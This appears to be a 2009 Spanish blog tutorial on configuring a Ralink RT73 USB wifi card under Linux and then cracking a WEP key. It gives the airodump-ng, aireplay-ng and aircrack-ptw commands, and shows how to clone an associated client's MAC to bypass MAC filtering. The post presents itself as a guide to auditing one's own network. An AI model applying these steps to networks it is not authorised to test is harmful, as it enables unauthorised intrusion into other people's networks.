30 de maig 2009

configurar targeta inalambriaca en linux y testear con wifiway y wifislax

RT73, no subestimes su poder con Wifiway

Vamos a comprobar la seguridad denuestra red inalámbrica. Lo que publico es siempre con un findidáctico para que cada uno compruebe la seguridad de su propia redinalámbrica. No me hago responsable del uso ilegítimo de losconocimientos aquí expuestos.


Para realizar esta tarea, vamos autilizar una tarjeta inalámbrica: LEVEL ONE wnc-0301usb V3, queincorpora un chipser de RALINK RT2528L, y tambien una distribuciondestinada a la auditoría inalámbrica. WIFIWAY, WIFISLAX, BACKTRACK.



PUNTO1. CONFIGURACION DE LA TARJETA INALÁMBRICA



Primero tenemos que saber si está o no conectada a nuestro equipo:

# lsusb

debe aparecer mas o menos lo siguiente:

Bus 003 Device 001: ID 0000:0000

Bus 002 Device 001: ID 0000:0000

Bus 001 Device 004: ID 148f:2573 RalinkTechnology, Corp.

Bus 001 Device 001: ID 0000:0000



Ahora vamos a montar el módulo que necesitamos para hacerla funcionar.

#modprobe rt73

ahora con la siguiente orden sabremos si ha montado el módulo o no:

#lsmod

y aparecerá el módulo rt73 en la lista.

Si tenemos problemas al tratar desmontarlo, es fácil que tengamos que desmontar algún módulo que cause conflicto. Para ello:

#modprobe -r




El siguiente paso consiste en montar el interfaz inalámbrico. La rt73 se monta como rausb0

#ifconfig rausb0 up




Lo preparamos para la auditoria:

#iwconfig rausb0 mode Monitor

Si este último paso nos da error,hacemos lo siguiente:

#ifconfig rausb0 down -desmontamos el dispositivo

#iwconfig rausb0 mode Monitor -lo montamos como modo monitor

#ifconfig rausb0 up -montamos el dispositivo




PUNTO2. COMENZAMOS LA AUDITORIA


Vamos a trabajar con varios programas

1- Airodump-ng


Airodump-ng es un programa destinado para captar paquetes encriptados, su funcionamiento es muy sencillo. Este programa debe ser el primero que hagamos trabajar, y que una vez lanzado, no debería detenerse.


Sintaxis:

#airodump-ng

*

Opciones:
o

--bssid: Especificar la MAC del punto de acceso “chequeado”
o

--channel: Especificamos el canal de rastreo
o

-w , especificamos el archivo donde se van a guardar las réplicas optenidas.
*

Dispositivo
o

especificamos el dispositivo inalámbrico: rausb0, wlan0, eth0 etc...


ahora viene la práctica:

1º,ejecutamos airodump sin especificar ninguna opcion:

#airodump-ng rausb0

2º,ahora comenzamos a especificar más detalles:

#airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel n -w aquí rausb0

entonces los Beacons, empiezan a subir y #Data tambien debería, pero si lo hace, lo hará muy lento.


Dejamos pués este programa lanzado, y nos vamos ahora a otro terminal, vamos a comenzar con las autentificaciones

2- Aireplay-ng

Este programa nos permite atacar los routers de distintos modos. Sintaxis:

#aireplay-ng

*

Opciones:
o

modos de ataque
+

-1 (autentificacion)
+

-3 (inyeccion)
o

MAC
+

-a MAC del punto de acceso
+

-b MAC del punto de acceso en inyeccion
+

-h MAC local
+

-e Essid del punto de acceso
*

Dispositivo inalámbrico pertinente


Vamoscon el ejemplo para entenderlo mejor:

1ºla autentificacion:

#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h kk:kk:kk:kk:kk:kk -e WLAN_XX rausb0

con esta orden:

o

(-1) significa que tratamos de autentificarnos
o

( 0) sólo lo haremos una vez
o

(-a) especificamos que queremos autentificarnos con el router que tiene la MAC especificada
o

(-h) especificamos que la autentificacion y asociacion se realizara con la MAC de mi tarjeta (para conocer la mac ifconfig)
o

(-e) tambien especificamos la essid del punto de acceso
o

rausb0, especificamos el adaptador inalámbrico


Con esto, nos asociamos y autentificamos con el router.

Esprobable que el router no nos deje asociarnos. Esto suele ser debido a que tiene un filtrado de MAC, es decir, solo puede conectarse a élla MAC que el tiene configuradas, o que el router no soporte este tipo de ataque.

Sitiene un filtrado de mac, hay que ver, qué otros clientes están asociados en el router, algo que aparece en airodump-ng en la parte inferior, clonar esa mac y comenzar otra vez

#macchanger -m

con esta orden cambiamos la mac del dispositivo inalámbrico


2º Inyeccion

#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h kk:kk:kk:kk:kk:kk -e WLAN_XX rausb0


y comenzará a inyectar paquetes al router.






PUNTO3. DESENCRIPTACION


Cuando en #Data aparecen unos 100,000, ya podemos comenzar a desencriptar la contraseña. Para ello empleamos un comando llamado aircrack


sintaxis:

#aircrack-ptw


ejemplo

siantes habiamos especificado en airodump, que el archivo donde seguardarian los paquetes se llamaría “aquí”, entonces:

#aircrack-ptw /root/aqui-01.cap


y al cabo de un tiempo nos dará la contraseña hexadecimal.



Espero que eso os soluciones algún problema.